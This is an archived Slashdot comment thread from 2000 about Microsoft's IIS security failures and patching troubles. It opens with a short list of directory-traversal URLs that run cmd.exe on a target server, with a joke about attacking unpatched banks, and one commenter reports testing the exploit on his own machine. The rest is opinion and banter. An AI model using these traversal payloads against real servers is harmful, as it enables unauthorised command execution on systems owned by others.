    http://target/scripts/..%c0%qf../winnt/system32/ cmd.exe?/c+dir
    http://target/scripts/..%c1%8s../winnt/system32/ cmd.exe?/c+dir
    http://target/scripts/..%c1%9c../winnt/system32/ cmd.exe?/c+dir
    http://target/scripts/..%c1%pc../winnt/system32/ cmd.exe?/c+dir

    Ok, now kids, don't go owning any banks running IIS today (Most are not patched)!
  • by roman_mir ( 125474 ) on Sunday November 05, 2000 @03:01PM (#647711) Homepage Journal
    Steve Mann who is a prof at UofT (Toronto) teaches hardware engineering and wearable computers noted that any MS Windows is a toy operating system. The guy only deals with Unix though.
  • All you can do now is neurotically, obsessively, try to think of every situation in which this cracking could happen, and try and cover it. Then ask all your friends, enemies, and family pets to tell you what you missed.

    That's not quite true, though. One additional, and very important, thing that you can do is to try to figure out how to minimize the damage that an attacker can do even if he does manage to crack something. This is an area in which Unix/Linux and NT both fall down pretty badly; they spend a lot of time trying to make it hard to get priviledge, but let you do pretty much anything you want if you do. There needs to be a lot more attention paid to making systems damage tolerant, so that a broken ftpd (or whatever) won't put the whole system at risk.

  • He is eager to throw money as ``good" causes, but has never thought about how much money he made by causing problems that need to be addressed by those ``good" causes.

    BillG has made most of his money from ripping off large, wealthy Western companies and large, wealthy Westerners. While ripping people off is always unethical, the cynical side of me says that if a large proportion of Bill Gates' wealth earned, by and large, from rich people, ends up going to people who really need it, that goes some way to squaring the ledger :)

  • by e_n_d_o ( 150968 ) on Sunday November 05, 2000 @04:14PM (#647718)
    I tried this exploit against one of MY OWN MACHINES. As in, a machine that is owned by me, on which I already know the Admin password etc.

    The first thing I tried was the cmd.exe /c dir command like x-empt suggested and the result was the expected.

    Then I pcanywhered in and decided to see if I remote launched notepad if it would appear on the display. When notepad.exe was launched, the whole system crumbled. I tried to kill it, but it won't die. Task Manager just says "Access Denied". Geez, where's kill -9 when you need it. I'm even logged in as admin. I can't kill the process, and I can't start anything except task manager. Can't even launch the services panel to kill IIS.

    So now I'm attempting the tried and true method of fixing a win box.
  • ...is at risk of being cracked.

    Connect your computer to the internet. Allow it to accept any connection of any sort, ever, from anyone.

    Congratulations. You're now at risk of being cracked.

    All you can do now is neurotically, obsessively, try to think of every situation in which this cracking could happen, and try and cover it. Then ask all your friends, enemies, and family pets to tell you what you missed.

    You're still going to get cracked one day, if enough people try, and enough people care. System administration is more about making this cracking difficult to the point of it not being worth it, rather than ruling it out altogether.

    --Remove SPAM from my address to mail me
  • by mangu ( 126918 ) on Sunday November 05, 2000 @11:04AM (#647724)
    Following a simple analogy to your reasoning, if no car manufacturer ever publishes their design details, how do criminals find out how to start the engine without the key? Simply put, it takes an engineer to design something, but any punk can find out a way to break things.

    You are assuming script-kiddies need the source code to find out vulnerabilities in software, but the truth is, if they were able to understand the design intrincacies of software they would not be script-kiddies.

    Believe me, for those of us who are competent enough to choose between building or destroying, it's much more rewarding to be creative.

  • Let me tell you one thing, debugging is hard work. If it was just a matter of "knowing some C and getting lucky" we wouldn't need so many tools to do the job.

    On the other hand, you don't need to pinpoint a weakness in the source code to break a software, you just overload it and see how it reacts. A chain is as weak as its weakest link, pull it with enough force and it will break.

    Determining the exact point of the failure is a work for the programmers who wrote the code, the crackers don't need to do that.

  • by Bender Unit 22 ( 216955 ) on Sunday November 05, 2000 @09:41AM (#647739) Journal
    We all know that most people here on ./ enjoys a good M$ bashing when they get the chance. Sometimes the subject are a bit questionable and not really good material for it. But if the article are correct, then they have really asked for it this time.
    Now for mine. A company that size with so many users depending on them, have a huge reasonability in keeping this from not happening. When it happened the first time, they should have the resources to make sure that it doesn't happen again. Don't tell me they can't divert the manpower needed to solve this. Let's see the list of posts grow as usual, can we go past 500. :-)
    [extreme bashing on]If they cant secure their own network based on their own products who can.[extreme bashing off]. ah felt good. :-)
    But somehow I doubt that it will affect anyone's decision about running their software. No impact at boss level, I'm afraid.
  • by Anonymous Coward on Sunday November 05, 2000 @09:44AM (#647741)
    I haxored kernel.org and downloaded the linux source code
  • by Anonymous Coward on Sunday November 05, 2000 @09:45AM (#647742)
    I love it, I absolutely love it. Sys admins are always being told that it's their fault for being hacked because they hadn't kept up on the latest patches. Now MS is whining and complaining that it's too hard to apply all those patches to all those servers. The message I'm getting is this:

    1) MS server software is, out of the box, full of security holes and downright dangerous to put on the Net without extensively patching them first, and

    2) Patching them won't even help you, because there are too many patches and too many holes. So many, in fact, that even MS can't keep up with them, even though the patches are developed and tested in the same building.

    Did I miss anything?

  • > Wow, I just compared Bill Gates to Buddha. I suddenly feel the need to go wash.

    Naw, just remember the old Zen koan:

    ``If you meet the Buddha on the road, KILL HIM!"

    (Note to the humor impared & windows-lovers out there: yes, I *am* making a joke.)


  • > Call it embarrassment, call it publicity, but please don't call it unadulterated altruism.

    Err, I don't think that my words implied that Billg was an example of ``unadulterated altruism". If being a limousine liberal was identical to pure unadulterated altruism, then we'd be giving Sally Struthers, spokeswoman for the ``Save the Children" foundation the Nobel Peace Prize, rather than Mother Teresa.

    Then again, even if ``a lot of the donating that he does comes with the proviso that his name is loudly involved, I'll admit for sake of fairness that it's more than some of his peers are doing. Will we ever see the ``Larry Ellison Home for Battered Women"? Or even an ``Andrew Grove Foundation for Judaic Studies"?

    So far, all I've seen created is Paul Allen's temple to Jimi Hendrix, & I'm still not convinced that even that is a good thing.


Someday your prints will come. -- Kodak